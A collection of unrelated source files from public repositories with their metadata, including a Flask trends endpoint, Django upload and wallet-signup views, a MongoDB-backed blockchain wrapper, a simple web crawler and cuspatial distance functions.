"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Slovakia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Slovenia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Solomon Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Somalia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Somaliland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"South Africa": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Spain": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sri Lanka": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sudan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"S. Sudan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Suriname": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Swaziland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sweden": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Switzerland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Syria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Taiwan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tajikistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tanzania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Thailand": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Timor-Leste": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Togo": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tonga": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Trinidad and Tobago": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tunisia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Turkey": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Turkmenistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Turks and Caicos Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Tuvalu": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Uganda": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ukraine": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"United Arab Emirates": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"United Kingdom": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"United States": {
"positive": 10, "neutral": 10, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Uruguay": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Uzbekistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Vanuatu": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Venezuela": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Vietnam": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"U.S. Virgin Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"West Bank and Gaza": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Western Sahara": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Yemen": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Zambia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Zimbabwe": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
}
}
return countries
@app.route('/trends')
def get_trends():
trends = api.trends_place(id = 1)
return jsonify({'trends' : trends}), {'Access-Control-Allow-Origin': '*'}
if __name__ == '__main__':
app.run()
|
[
"zainmustafa@Zains-MacBook-Pro.local"
] |
zainmustafa@Zains-MacBook-Pro.local
|
634a7e6ba53de55dedd32d88b1d65db04278345f
|
da18a193b24638bb11429d5038b5b5028b46373f
|
/service/service.py
|
2d5b0bd3a2032fc75cd51624155f44b073a1e6da
|
[] |
no_license
|
ankurmishra1394/Image-Management-API
|
2b4587173c029fce0dc9e05d91f4b662934e3c2e
|
df8a166e4397aa6226a9a97cb2fed74303dd07f8
|
refs/heads/master
| 2021-08-09T15:23:07.714662
| 2017-11-12T07:53:21
| 2017-11-12T07:53:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,992
|
py
|
'''
class-name LocalUploader
LocalUploader class is being used for storing the uploaded files on to the server
This class contains some methods for uploading, viewing, updating and deleting file from/on server.
'''
class LocalUploader(object):
##
# To Upload Multiple Files onto the Server
# @param request object
# @return list[Uploads-model-object]
##
def upload(self, request):
import os
from models import Uploads
from utility import get_file_details, generate_uuid
from validator import on_upload_request
from PIL import Image
if not os.path.isdir(os.environ['UPLOAD_FOLDER']):
os.mkdir(os.environ['UPLOAD_FOLDER'])
on_upload_request(request)
files = request.FILES.getlist('files[]')
upload_response = []
for file in files:
file_detail = get_file_details(file, request)
pil_image = Image.open(file, 'r')
pil_image.save(os.path.join(os.environ['UPLOAD_FOLDER'], file_detail['local_name']), pil_image.format, quality=70)
upload = Uploads(**file_detail).save()
if upload:
upload_response.append(upload)
return upload_response
##
# To View a file using the SelfLink, which is provided when user uploads a file
# @param request object
# @return file
##
def accessFile(self, request, filename):
import os
from validator import on_upload_access_request
from utility import load_file, get_mime_from_path
if not os.path.isdir(os.environ['UPLOAD_FOLDER']):
os.mkdir(os.environ['UPLOAD_FOLDER'])
on_upload_access_request(filename)
filepath = os.path.join(os.environ['UPLOAD_FOLDER'], filename)
return load_file(filepath), get_mime_from_path(filepath)
##
# To update a file with another using upload-id
# A file can only be updated by the owner of the file.
# @param request object, upload-id
# @return Uploads-model-object
##
def update(self, request, upload_id):
from validator import on_upload_update_request
from models import Uploads
from utility import get_file_details
from PIL import Image
import os
on_upload_update_request(request, upload_id)
file = request.FILES['files[]']
file_detail = get_file_details(file, request, upload_id)
pil_image = Image.open(file, 'r')
pil_image.save(os.path.join(os.environ['UPLOAD_FOLDER'], file_detail['local_name']), pil_image.format, quality=70)
return Uploads.manager.filterUpload({'id':upload_id})[0]
##
# To delete a file with using upload-id
# A file can only be deleted by the owner of the file.
# @param request object, upload-id
# @return bool
##
def delete(self, request, upload_id):
from models import Uploads
from utility import delete_file, auth
upload = Uploads.manager.filterUpload({'id':upload_id, 'user_id':auth(request).id})
if len(upload):
delete_file(upload[0].path)
return upload[0].delete()
else:
from upload_service.middleware.exception.NotFoundException import NotFoundException
raise NotFoundException(params={'upload-id'}, payload=(['hint','Please provide a valid upload id'],))
|
[
"ankurmishra0113@gmail.com"
] |
ankurmishra0113@gmail.com
|
e364df9ca876ec4a9c08bd80bc41c32c299fef9e
|
0212052f3e8be319130986845f41e140598a21ac
|
/Gallery/main/models.py
|
1bde24eaf65121f9f70869ac71560d07a6a964cd
|
[] |
no_license
|
keerthi-aluvala/Gallery
|
59bcfc89b588937224bdb86cb25c96f38f82761c
|
1eecccca9b3fdcd8448756ce2c20b438c814ede9
|
refs/heads/master
| 2023-07-28T16:23:59.976639
| 2021-09-15T10:09:33
| 2021-09-15T10:09:33
| 406,399,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
from django.db import models
from django.db.models import Model
from django.urls import reverse
class post(models.Model):
ImgName = models.CharField(max_length=100)
ImgURL = models.URLField(max_length = 200)
ImgDetails = models.TextField()
def __str__(self):
return self.ImgName
def get_absolute_url(self):
return reverse('post-detail',kwargs={'pk': self.pk})
|
[
"keerthialuvala7@gmail.com"
] |
keerthialuvala7@gmail.com
|
acdda252484cb17888b94d4969ee876e1f3b628e
|
48025a7707c346e1d101d2cc6254b3d7fbcdbbc2
|
/users/views.py
|
70636e5fda39403e7a71fda2090c26ed78afc794
|
[] |
no_license
|
pratikgupta222/wallet_management
|
144a00062406c4906c3b1519a4015924ba7d021d
|
eaa14cb289ba8e2b1c9e3630ab6f1aab7d7acf04
|
refs/heads/master
| 2020-04-25T05:11:48.520580
| 2019-03-06T23:19:09
| 2019-03-06T23:19:09
| 172,534,547
| 1
| 0
| null | 2019-03-06T23:19:10
| 2019-02-25T15:43:04
|
Python
|
UTF-8
|
Python
| false
| false
| 4,288
|
py
|
from django.db import transaction
from rest_framework import status, views
from rest_framework.authentication import BasicAuthentication
from rest_framework.permissions import IsAuthenticated, AllowAny
from rest_framework.response import Response
from users.models import User
from users.helpers import *
from users.permissions import CsrfExemptSessionAuthentication
from wallet.helpers import create_wallet_for_user
# Create your views here.
class UserLogin(views.APIView):
"""
User Authentication to be done here and the response with the
user token to be provided.
"""
authentication_classes = (
CsrfExemptSessionAuthentication, BasicAuthentication)
permission_classes = (AllowAny,)
def post(self, request):
data = request.data
print("This is the data : ", data)
email = data.get("email").strip()
password = data.get("password").strip()
login_response = User.objects.do_login(
request=request, email=email, password=password)
if login_response.status_code == status.HTTP_200_OK:
user = login_response.data.get('user')
token = login_response.data.get('token')
response = {
'status': True,
'message': {
'name': user.name,
'email': user.email,
'mAuthToken': token,
}
}
return Response(status=status.HTTP_200_OK, data=response, content_type='text/html; charset=utf-8')
response = {
'text': login_response.data
}
return Response(status=login_response.status_code, data=response, content_type='text/html; charset=utf-8')
class UserSignup(views.APIView):
"""
Registration of the new user for accessing the wallet
"""
permission_classes = (AllowAny,)
authentication_classes = (
CsrfExemptSessionAuthentication, BasicAuthentication)
def post(self, request):
"""
Creating the new user along with the wallet
:param request: A dict of the format
{
"email": "xyz@gmail.com",
"password": "1234",
"phone": "7867898798",
"name": "xyz"
}
:return: Below is the response if provided with valid request
{
'name': 'Name of the user',
'email': 'email of the user',
'mAuthToken': 'authorization token',
}
"""
data = request.data
response = {
'status': False,
'message': {
'text': '',
}
}
try:
data = validate_user_data(data, response)
except ValidationError as e:
return Response(status=status.HTTP_400_BAD_REQUEST, data=e.args[0])
with transaction.atomic():
try:
user = User.objects.create_user(**data)
except Exception as e:
transaction.set_rollback(True)
response['message'] = e.args[0]
return Response(status=status.HTTP_400_BAD_REQUEST,
data=response)
login_response = User.objects.do_login(request=request, user=user)
if login_response.status_code != status.HTTP_200_OK:
transaction.set_rollback(True)
return Response(status=login_response.status_code,
data=login_response.data)
token = login_response.data.get('token')
new_wallet = create_wallet_for_user(user)
if not new_wallet.get('ret_status') == status.HTTP_201_CREATED:
transaction.set_rollback(True)
print("Transaction rollback is done before this")
return Response(status=new_wallet['ret_status'],
data=new_wallet)
response['status'] = True
response['message'] = {
'name': user.name,
'email': user.email,
'mAuthToken': token,
}
return Response(status=status.HTTP_200_OK, data=response,
content_type='text/html; charset=utf-8')
|
[
"pratikgupta222@gmail.com"
] |
pratikgupta222@gmail.com
|
a0e23f6a3c0c9cdb18ef53bd34c776108cfea1db
|
a877e4c20c302127a1370b67bc16c30af9bcbb5c
|
/PTT_KCM_API/tests.py
|
7e940839c6f9473976b84ee0ef84d5f858c52200
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
UDICatNCHU/PTT_KCM_API
|
a727256c0561b139b041a0369218bcb1d0f9523e
|
557f4669adb80b13a61061ad9bf5d1926a476c27
|
refs/heads/master
| 2021-01-12T16:17:11.814661
| 2017-01-01T07:48:36
| 2017-01-01T07:48:36
| 71,979,578
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 529
|
py
|
from django.test import TestCase
from django.test import Client
from django.core.urlresolvers import reverse
from djangoApiDec.djangoApiDec import getJsonFromApi
import subprocess
# Create your tests here.
class ApiTestCase(TestCase):
def init(self):
self.client = Client()
def test_api_works(self):
subprocess.call(['rm', '-rf', 'json'])
response = self.client.get(reverse('PTT_KCM_API:locations')+"?issue=黑特")
"""Animals that can speak are correctly identified"""
self.assertEqual(response.status_code, 200)
|
[
"davidtnfsh@gmail.com"
] |
davidtnfsh@gmail.com
|
72b2a0612ddf0ffc92368d6b3dc82a8b544faf7e
|
f32d210cde79a724d819b0e193914144ed5e99aa
|
/bin/easy_install
|
f90cc5ca7ec77f077fd653836694e0918fd27887
|
[] |
no_license
|
ojas97/Face_reco
|
7020709450fd683ccf34462357396e29e707cfaf
|
ad6638dd05b0d629a15dea8892bec942e74e4dea
|
refs/heads/master
| 2020-03-10T14:42:15.527509
| 2018-04-14T13:09:20
| 2018-04-14T13:09:20
| 129,432,896
| 0
| 1
| null | 2018-04-14T11:13:46
| 2018-04-13T17:18:43
|
Python
|
UTF-8
|
Python
| false
| false
| 271
|
#!/home/ojas/PycharmProjects/Term_Project/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ojasagarwal97@gmail.com"
] |
ojasagarwal97@gmail.com
|
|
c1a988ceb9d4927e78e0e02a15b68ff07d1ccab1
|
8032cf4330288a9d947bd0f48d13c450346ed9c9
|
/color_mongo.py
|
b32d30c29204f8ef1c25a3b34c07211e93bd935b
|
[
"Apache-2.0"
] |
permissive
|
ColorPlatform/spectrum-mvp
|
eefd16160e9e0ef38f4c9e96644201a29035a348
|
48a5fa3664a4778d60fcf8f88992e14c988548be
|
refs/heads/master
| 2022-12-14T19:42:47.208421
| 2018-12-18T10:02:45
| 2018-12-18T10:02:45
| 162,266,191
| 1
| 0
|
NOASSERTION
| 2022-12-08T01:20:21
| 2018-12-18T09:49:28
|
Python
|
UTF-8
|
Python
| false
| false
| 4,380
|
py
|
import pymongo
import json
from bson.py3compat import (_unicode)
class ColorMongo:
"""This class looks like MongoDB API, but allows only operations supported in chaincode
"""
def __init__(self, blockchain_url, database_host, database_name='WALLETSDB', collection_name='wallets'):
self.__client = pymongo.MongoClient(host='mongodb://' + database_host)
self.__database = self.__client[database_name]
self.__collection = self.__database[_unicode(collection_name)]
self.__updates = []
self.__inserts = []
self.__prestate = []
self.__session = None
self.__blockchain = Blockchain(blockchain_url)
def insert_one(self, document):
# appends documents to list of inserts
self.__inserts.append(document)
pass
def update_one(self, filter, update):
# appends update command to list of updates
# TODO Stop when called outside transaction
# Filtering only supported by "key"
# Updating is only supported by $set "value"
# Supported format: updateOne({“key”: “Vasya”}, {“$set”: {“value”: 900}})
# TODO Check parameters, fail in case of unsupported syntax
self.__updates.append({"method": "update_one", "filter": filter, "update": update})
return self.__collection.update_one(filter, update, session=self.__session)
def find_one(self, filter):
# appends
# TODO Stop when called outside transaction
# TODO Check parameters, fail in case of unsupported syntax
# Supported format: findOne({“key”: “Petya”})
result = self.__collection.find_one(filter, session=self.__session)
self.__prestate.append(result)
return result
def start_transaction(self):
# TODO Stop when called inside transaction
self.__updates = []
self.__prestate = []
self.__session = self.__client.start_session(causal_consistency=False)
self.__session.start_transaction()
return self
def _convert_data(self):
"""Convert data from mongo-related format to chaincode supported format"""
# commands = [{"key": c["filter"]["key"], "value": c["update"]["$set"]["value"]} for c in self.__updates]
update_commands = [["wallet", "base_collection", c["filter"]["key"], "value", c["update"]["$set"]["value"]] for c in self.__updates]
insert_commands = [["wallet", "base_collection", d["key"], key, d[key]] for d in self.__inserts for key in d]
# insert_commands = [item for sublist in complex_insert_commands for item in sublist]
commands = insert_commands + update_commands
# print(commands)
# TODO Filter out Object ids from prestate
prestate = [["wallet", "base_collection", d["key"], key, d[key]] for d in self.__prestate for key in d if key != "_id"]
return {"prestate": prestate, "commands": commands}
def commit_transaction(self):
result = self.__blockchain.check_transaction(self._convert_data())
if not result:
result = 0
# We don't want changes will be persisted now in local Mongo, polling is responsible for this.
self.__session.abort_transaction()
return result
def abort_transaction(self):
self.__session.abort_transaction()
self.__session.end_session()
return
class Blockchain:
def __init__(self, url):
self.__url = url
def check_transaction(self, data):
# TODO Implement when API specification arrives (some data transformation could be needed)
# HTTP POST /updates {"updates": self.__updates, "prestate": self.__prestate}
# Now just random wait
import time
import random
from hfc.fabric import Client
import json
cli = Client(net_profile="test/fixtures/network-k8s.json")
org1_admin = cli.get_user(org_name='org1.example.com', name='Admin')
try:
print(data)
response = cli.chaincode_invoke(
requestor=org1_admin,
channel_name='businesschannel',
peer_names=['peer0.org1.example.com'],
args=[json.dumps(data)],
cc_name='example_cc_2',
cc_version='v1.0'
)
except Exception as e:
return -1
|
[
"a.tapekhin@gmail.com"
] |
a.tapekhin@gmail.com
|
1c37c034aa9ddf26b763e81f1d2a97817418c05d
|
6db191f44416ab051a2afeb674b8b667ace63490
|
/shellob.py
|
233fdaab05a0d812c88413765bd39e8e9937fee6
|
[] |
no_license
|
maldy/shellob
|
82a665c0576429b59ee6756d86c350ddb232ca1f
|
d139b558257ff7fc24b4b1d06ae11365ff1345a8
|
refs/heads/master
| 2020-04-06T06:55:21.288521
| 2011-10-22T11:45:53
| 2011-10-22T11:45:53
| 2,375,173
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,919
|
py
|
#!/usr/bin/env python
"""
shellob.py
! !
\._\____/_./
_._/ \_._
.-\____/-.
/ oOOo \
< >
A slightly simple webcrawler.
"""
__version__ = "0.5"
__authors__ = "maldy (lordmaldy at gmail dot com), Vishaka (vishakadatta at\
gmail dot com)"
import re
import socket
import datetime
import errno
# stuff you'll have to install - all available with python setuptools
from mechanize import Browser, HTTPError, URLError, BrowserStateError
import pymongo
mongo_host = '10.109.27.150'
mongo_port = 27017
espn_regex = re.compile(r'/football/')
fixture_regex = re.compile(r'/fixtures/')
PORT = 10000
URL_TIMEOUT = 60 #Time-out to wait for page to load
class Crawler():
def __init__(self):
self.br = Browser()
self.br.set_handle_redirect(True)
self.queue_server = {"host": "localhost", "port": PORT}
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.sock.connect((self.queue_server['host'], self.queue_server['port']))
except socket.error, (value, message):
print "Could not connect to queue server at " + self.queue_server['host'] +\
":" + str(self.queue_server['port'])
print message
return
def recv_delim(self, buf_len, delim):
data = ""
while True:
recv_data = self.sock.recv(buf_len)
data += recv_data
if delim in data:
return data[:-1]
def send_msg(self, msg, delim):
msg_len = len(msg)
bytes_sent = 0
while bytes_sent < msg_len:
sent = self.sock.send( msg + delim )
bytes_sent += sent
msg = msg[sent+1:]
return bytes_sent
def crawl(self):
while True:
# grab the next url off the queue server
buf_left = 10000
url_msg = self.recv_delim( 4096, '\0')
depth_end = url_msg.find('\1')
url = url_msg[depth_end+1:]
depth = int(url_msg[0:depth_end])
print str(datetime.datetime.utcnow()) + " URL received from queue server ->" + url +\
" Depth : " + str(depth)
# fetch url contents (filter stuff here)
try :
response = self.br.open(url,timeout=URL_TIMEOUT)
if response:
print "Crawl successful"
crawler_ack = 's'
connection = pymongo.Connection(mongo_host, mongo_port)
db = connection.final_espn_corpus
html = response.read()
post = {"url": url, "crawl_time": datetime.datetime.utcnow(), "content": html}
posts = db.pages
posts.update({"url": url},post, True)
else:
print "Crawl failed - Timeout"
crawler_ack = 'f'
except HTTPError, e:
print "Crawl failed - HTTP error"
if e.code >= 400 and e.code<= 417:
crawler_ack = 'd'
else:
crawler_ack = 'f'
except URLError:
print "Crawl failed - Could not open page"
crawler_ack = 'f'
links_found = []
if crawler_ack is 's':
try:
links_found = list( self.br.links() )
except BrowserStateError:
print "Crawl failed - Mechanize error"
crawler_ack = 'd'
except socket.timeout:
print "Crawl failed - links() timed out"
crawler_ack = 'f'
crawler_msg = crawler_ack + "*"
depth += 1 #All links in this page are at lower depth.
for link in links_found:
if espn_regex.search(link.absolute_url) and not \
fixture_regex.search(link.absolute_url):
if link.absolute_url[-1] is not '/':
link.absolute_url += '/'
url_msg = str(depth) + '\1' + link.absolute_url + '*'
crawler_msg += url_msg
bytes_sent = self.send_msg( crawler_msg, '\0' )
self.sock.close()
def main():
# thread and unleash shellob onto the unsuspecting site. Amok!
c = Crawler()
c.crawl()
if __name__ == "__main__":
main()
##############################
# Code Snippet dump - ignore #
##############################
"""
response = self.br.open(url)
for link in self.br.links():
print link
response.seek(0)
html = response.read()
root = lxml.html.fromstring(html)
for link in root.iterlinks():
print link
"""
|
[
"lordmaldy@gmail.com"
] |
lordmaldy@gmail.com
|
9769b68ced1dc51abf28a9414ee09acacdfb932d
|
7223690a5bf83b3fd5141fb906cf91c58ed9063c
|
/Practice/dollar.py
|
406dd91288977a12f456b24032fa0917f4f5ac46
|
[] |
no_license
|
BowwowKeye/wasteyard
|
74326059ec784b9d0ba9fbb3031e794d409dcd3e
|
4f4309dd4a46228950ddda0d333564ef27f8fa6b
|
refs/heads/master
| 2021-04-06T10:19:11.033944
| 2018-06-06T12:22:30
| 2018-06-06T12:22:30
| 124,637,011
| 0
| 0
| null | 2018-03-11T03:58:47
| 2018-03-10T08:31:47
|
Python
|
UTF-8
|
Python
| false
| false
| 280
|
py
|
total=raw_input('input your money')
total=float(total)
if total<1:
total*=100
(quarter,total)=divmod(total,25)
(dime,total)=divmod(total,10)
(nickel,total)=divmod(total,5)
(cent,total)=divmod(total,1)
print 'quarter:%d,dime:%d,nickel:%d,cent:%d' % (quarter,dime,nickel,cent)
|
[
"quant.wkai@gmail.com"
] |
quant.wkai@gmail.com
|
000520180d72bddfb7d6589c47de3fce6083e0a2
|
bf593db51f9a3ef9a4cd8235466e4dd138ee61f2
|
/IT 310 - Data Structures and Algorithms/6.5.py
|
11f04298206910ee925b9d81c8a8bd8032aad2a7
|
[] |
no_license
|
TylerBade/Classwork
|
101e35d006cdf5d52079270c0f745a87a3142774
|
43ecc9b46d2d7fe604eac33ca064e9bc1c23302c
|
refs/heads/master
| 2020-03-22T04:55:15.210658
| 2018-10-22T06:53:05
| 2018-10-22T06:53:05
| 137,776,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 791
|
py
|
class Stack:
def __init__( self ):
self._items = list();
def isEmpty( self ):
return len( self ) == 0;
def __len__ (self):
return len(self._items);
def peek(self):
if self.isEmpty():
return "No values to peek at.";
else:
return self._items[-1];
def pop (self):
if self.isEmpty():
return "No values to pop.";
else:
return self._items.pop()
def push(self, item):
self._items.append(item);
def __str__(self):
return repr(self._items);
newStack = Stack()
newStack.push(4)
newStack.push(5)
newStack.push(6)
newStack.push(10)
print(newStack)
revStack = Stack()
while not newStack.isEmpty():
revStack.push(newStack.pop());
print(revStack)
|
[
"Tjbade@gmail.com"
] |
Tjbade@gmail.com
|
e9fdf3118d27b5e5d62637f7854d1467fe0198df
|
eec259ed9551157fc7d39759be9da014e6b56cd0
|
/python/cuspatial/cuspatial/core/spatial/distance.py
|
fa53bacee3fac90172a1d21e6206b47b279b871d
|
[
"Apache-2.0"
] |
permissive
|
rapidsai/cuspatial
|
b4699ffe73ac217ec40244e231d33675470d3e30
|
a87d21f0cf70116576bf7dbdd42db2bcfd50e7d4
|
refs/heads/branch-23.10
| 2023-08-31T10:49:25.144482
| 2023-08-30T22:02:04
| 2023-08-30T22:02:04
| 199,666,905
| 509
| 136
|
Apache-2.0
| 2023-09-08T21:07:05
| 2019-07-30T14:23:22
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 22,088
|
py
|
# Copyright (c) 2022-2023, NVIDIA CORPORATION.
import cudf
from cudf import DataFrame, Series
from cudf.core.column import as_column
from cuspatial._lib.distance import (
directed_hausdorff_distance as cpp_directed_hausdorff_distance,
haversine_distance as cpp_haversine_distance,
pairwise_linestring_distance as cpp_pairwise_linestring_distance,
pairwise_linestring_polygon_distance as c_pairwise_line_poly_dist,
pairwise_point_distance as cpp_pairwise_point_distance,
pairwise_point_linestring_distance as c_pairwise_point_linestring_distance,
pairwise_point_polygon_distance as c_pairwise_point_polygon_distance,
pairwise_polygon_distance as c_pairwise_polygon_distance,
)
from cuspatial._lib.types import CollectionType
from cuspatial.core.geoseries import GeoSeries
from cuspatial.utils.column_utils import (
contains_only_linestrings,
contains_only_multipoints,
contains_only_points,
contains_only_polygons,
)
def directed_hausdorff_distance(multipoints: GeoSeries):
"""Compute the directed Hausdorff distances between all pairs of
spaces.
Parameters
----------
multipoints: GeoSeries
A column of multipoint, where each multipoint indicates an input space
to compute its hausdorff distance to the rest of input spaces.
Returns
-------
result : cudf.DataFrame
result[i, j] indicates the hausdorff distance between multipoints[i]
and multipoint[j].
Examples
--------
The directed Hausdorff distance from one space to another is the greatest
of all the distances between any point in the first space to the closest
point in the second.
`Wikipedia <https://en.wikipedia.org/wiki/Hausdorff_distance>`_
Consider a pair of lines on a grid::
:
x
-----xyy---
:
:
x\\ :sub:`0` = (0, 0), x\\ :sub:`1` = (0, 1)
y\\ :sub:`0` = (1, 0), y\\ :sub:`1` = (2, 0)
x\\ :sub:`0` is the closest point in ``x`` to ``y``. The distance from
x\\ :sub:`0` to the farthest point in ``y`` is 2.
y\\ :sub:`0` is the closest point in ``y`` to ``x``. The distance from
y\\ :sub:`0` to the farthest point in ``x`` is 1.414.
Compute the directed hausdorff distances between a set of spaces
>>> pts = cuspatial.GeoSeries([
... MultiPoint([(0, 0), (1, 0)]),
... MultiPoint([(0, 1), (0, 2)])
... ])
>>> cuspatial.directed_hausdorff_distance(pts)
0 1
0 0.0 1.414214
1 2.0 0.000000
"""
num_spaces = len(multipoints)
if num_spaces == 0:
return DataFrame()
if not contains_only_multipoints(multipoints):
raise ValueError("Input must be a series of multipoints.")
result = cpp_directed_hausdorff_distance(
multipoints.multipoints.x._column,
multipoints.multipoints.y._column,
as_column(multipoints.multipoints.geometry_offset[:-1]),
)
return DataFrame._from_columns(result, range(num_spaces))
def haversine_distance(p1: GeoSeries, p2: GeoSeries):
"""Compute the haversine distances in kilometers between an arbitrary
list of lon/lat pairs
Parameters
----------
p1: GeoSeries
Series of points as floats
p2: GeoSeries
Series of points as floats
Returns
-------
result : cudf.Series
The distance between pairs of points between `p1` and `p2`
>>> import cudf
>>> import cuspatial
>>> a = {"latitude":[0.0,0.0,1.0,1.0],
... "longitude": [0.0,1.0,0.0,1.0]}
>>> df = cudf.DataFrame(data=a)
>>> # Create cuSpatial GeoSeries from cuDF Dataframe
>>> gs = cuspatial.GeoSeries.from_points_xy(
... df[['longitude', 'latitude']].interleave_columns()
... )
>>> # Create Comparator cuSpatial GeoSeries from a comparator point
>>> df['compare_lat'] = 2.0 # this will broadcast the value to all rows
>>> df['compare_lng'] = 2.0
>>> cmp_gs = cuspatial.GeoSeries.from_points_xy(
... df[['compare_lat', 'compare_lng']].interleave_columns()
... )
>>> # Calculate Haversine Distance of cuDF dataframe to comparator point
>>> df['compare_dist'] = cuspatial.haversine_distance(gs, cmp_gs)
>>> df.head()
latitude longitude compare_lat compare_lng compare_dist
0 0.0 0.0 2.0 2.0 314.474805
1 0.0 1.0 2.0 2.0 248.629315
2 1.0 0.0 2.0 2.0 248.568719
3 1.0 1.0 2.0 2.0 157.225432
"""
if any([not contains_only_points(p1), not contains_only_points(p2)]):
raise ValueError("Input muist be two series of points.")
if len(p1) != len(p2):
raise ValueError("Mismatch length of inputs.")
p1_lon = p1.points.x._column
p1_lat = p1.points.y._column
p2_lon = p2.points.x._column
p2_lat = p2.points.y._column
return cudf.Series._from_data(
{"None": cpp_haversine_distance(p1_lon, p1_lat, p2_lon, p2_lat)}
)
def pairwise_point_distance(points1: GeoSeries, points2: GeoSeries):
"""Compute distance between (multi)points-(multi)points pairs
Currently `points1` and `points2` must contain either only points or
multipoints. Mixing points and multipoints in the same series is
unsupported.
Parameters
----------
points1 : GeoSeries
A GeoSeries of (multi)points
points2 : GeoSeries
A GeoSeries of (multi)points
Returns
-------
distance : cudf.Series
the distance between each pair of (multi)points
Examples
--------
>>> from shapely.geometry import Point, MultiPoint
>>> p1 = cuspatial.GeoSeries([
... MultiPoint([(0.0, 0.0), (1.0, 0.0)]),
... MultiPoint([(0.0, 1.0), (1.0, 0.0)])
... ])
>>> p2 = cuspatial.GeoSeries([
... Point(2.0, 2.0), Point(0.0, 0.5)
... ])
>>> cuspatial.pairwise_point_distance(p1, p2)
0 2.236068
1 0.500000
dtype: float64
"""
if not len(points1) == len(points2):
raise ValueError("`points1` and `points2` must have the same length")
